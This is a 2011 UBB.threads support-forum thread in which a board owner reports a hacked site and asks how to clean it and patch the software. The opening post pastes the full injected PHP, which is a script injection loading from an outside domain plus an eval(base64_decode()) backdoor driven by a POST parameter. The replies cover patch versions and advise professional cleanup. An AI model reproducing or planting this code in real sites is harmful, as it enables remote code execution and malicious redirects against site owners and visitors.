Previous Thread
Next Thread
Print Thread
Hop To
Board Hacked
#246683 11/09/2011 3:31 PM
Joined: Jul 2009
Posts: 18
tranmkp Offline OP
stranger
OP Offline
stranger
Joined: Jul 2009
Posts: 18
Some Russian crap site re-director somehow comprised all the php on our web site. No idea how - anyway I can see his code in every php header of page -

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }


I can see it in these two pages ultimatebb.php ---ubbaccel_test.php any other php pages in other directories?

Will I void my support if I remove it all?

Next - is how did they do it?



Re: Board Hacked
tranmkp #246684 11/09/2011 3:34 PM
Joined: Jun 2006
Posts: 1,344
veteran
Offline
veteran
Joined: Jun 2006
Posts: 1,344
What version of ubb are you running?

Re: Board Hacked
tranmkp #246685 11/09/2011 3:37 PM
Joined: Jul 2005
Posts: 45
mig Offline
newbie
Offline
newbie
Joined: Jul 2005
Posts: 45

Re: Board Hacked
gliderdad #246781 11/13/2011 1:04 PM
Joined: Jul 2009
Posts: 18
tranmkp Offline OP
stranger
OP Offline
stranger
Joined: Jul 2009
Posts: 18
7.5.4.2

Re: Board Hacked
tranmkp #246782 11/13/2011 1:31 PM
Joined: Jul 2009
Posts: 18
tranmkp Offline OP
stranger
OP Offline
stranger
Joined: Jul 2009
Posts: 18
so I went and downloaded the patch - #12 ( I have 7.5.4.2)

Uploaded and overwrote the directories. After flushing cache - How do I verify the patch is functional?

Re: Board Hacked
tranmkp #246783 11/13/2011 1:32 PM
Joined: Jan 2008
Posts: 514
addict
Offline
addict
Joined: Jan 2008
Posts: 514
should say something like this at the bottom of the board...

Powered by UBB.threadsâ„¢ 7.5.6p2

Re: Board Hacked
Dunny #246790 11/13/2011 3:27 PM
Joined: Jul 2009
Posts: 18
tranmkp Offline OP
stranger
OP Offline
stranger
Joined: Jul 2009
Posts: 18
nope - nothing yet

Re: Board Hacked
tranmkp #246794 11/13/2011 4:10 PM
Joined: Jun 2006
Posts: 15,939
Likes: 29
UBB.threads Developer
Online Tapedshut
UBB.threads Developer
Joined: Jun 2006
Posts: 15,939
Likes: 29
Well, just installing a patch isn't going to fix the problems you have now; it's likely that an attacker has installed a backdoor to allow them to come in and make a mess whenever they want (like the hackers did on most of the forums which where hit a month ago)... You should consider hiring someone to dig through your webspace to check for any of them.


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, I Find Rocks, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Re: Board Hacked
tranmkp #246795 11/13/2011 4:12 PM
Joined: Jun 2006
Posts: 15,939
Likes: 29
UBB.threads Developer
Online Tapedshut
UBB.threads Developer
Joined: Jun 2006
Posts: 15,939
Likes: 29
Originally Posted by tranmkp
nope - nothing yet
Well, if it doesn't show that it's been patched, and you've cleared the cache, you should try re-applying the patch and clearing the cache again... If that doesn't work, try deleting everything from /cache and /templates/compiled and then clear the cache again (or consider paying someone to upgrade you to the latest build; plenty of us offer these services)


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, I Find Rocks, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Re: Board Hacked
tranmkp #246802 11/13/2011 5:52 PM
Joined: Jan 2008
Posts: 514
addict
Offline
addict
Joined: Jan 2008
Posts: 514
I had an issue with file permissions when I installed the files... after I went back and fixed those permissions everything came up correctly.

Dunny

Re: Board Hacked
tranmkp #246804 11/13/2011 5:55 PM
Joined: Dec 2003
Posts: 6,144
Likes: 22
Offline
Joined: Dec 2003
Posts: 6,144
Likes: 22
Originally Posted by tranmkp
so I went and downloaded the patch - #12 ( I have 7.5.4.2)

Uploaded and overwrote the directories. After flushing cache - How do I verify the patch is functional?
Noticing you have v 7.5.4.2 what is the reference to #12.

Okay I get the #12 now.
If you did not upgrade your version you should have used #10
the #12 patch is for 7.5.6 you need the one for your version.

Last edited by Ruben; 11/13/2011 6:00 PM. Reason: Added Comment

Blue Man Group
There is no such thing as stupid questions. Just stupid answers
Re: Board Hacked
tranmkp #246806 11/13/2011 6:06 PM
Joined: Dec 2003
Posts: 6,144
Likes: 22
Offline
Joined: Dec 2003
Posts: 6,144
Likes: 22
Also I am amazed you are lucky enough to not have hosed your board using the wrong patch.


Blue Man Group
There is no such thing as stupid questions. Just stupid answers
Re: Board Hacked
Ruben #246821 11/13/2011 8:48 PM
Joined: Jun 2006
Posts: 15,939
Likes: 29
UBB.threads Developer
Online Tapedshut
UBB.threads Developer
Joined: Jun 2006
Posts: 15,939
Likes: 29
Originally Posted by Ruben
Also I am amazed you are lucky enough to not have hosed your board using the wrong patch.
Agreed... If this type of thing isn't something you're comfortable with, I'd really hire out to do it as you can make a larger mess in general...

I mean, I upgrade forums for a modest fee, but having to go in and figure out what is hosed would end up taking longer and thus cost more...


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Do you need Forum Install or Upgrade Services?
Forums: A Gardeners Forum, I Find Rocks, Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Re: Board Hacked
tranmkp #246854 11/14/2011 7:36 PM
Joined: Jun 2006
Posts: 81
member
Offline
member
Joined: Jun 2006
Posts: 81
Computer code is VERY unforgiving. Along with Ruben and Gizmo, I am amazed that your board worked at all.


Gizmo is being nice while laying it out like it is.

Think about taking your car to a good mechanic when you first have a problem.

It will cost you a little, but you will feel comfortable in the knowledge that you got good service for a fair price.

Now, let's say that you tried to fix your car yourself and really made a mess of things.

To start... Many shops will send you packing, not wanting to bother with a botched job. The shops that will accept the work are going to charge you for their trouble. Some will rake you over for it.

You can bet that Gizmo would want something extra up front for what could be an open ended issue. The risk for him is that he spends several hours to come to the conclusion that it is a lost cause. That is a customer support nightmare and not a fun phone call to make.









Link Copied to Clipboard
ShoutChat Box
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
Followed Threads
by FREAK - 07/13/2020 9:13 PM
Can't Delete or Add New Forum
by FREAK - 07/13/2020 8:25 PM
Non-Admin users can't see attached pictures
by jjjjj - 07/11/2020 8:09 PM
[NOTABUG] Report Post bug..
by Morgan - 07/05/2020 1:48 PM
Trial Subscription question.
by Ruben - 07/03/2020 2:34 PM
Who's Online Now
3 members (Gizmo, FREAK, 1 invisible), 88 guests, and 44 robots.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
3D Creations
3D Creations
by JAISP, December 30
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Amusing Terain Scenics
Amusing Terain Scenics
by isaac, August 19
Sky places
Sky places
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 7.7.4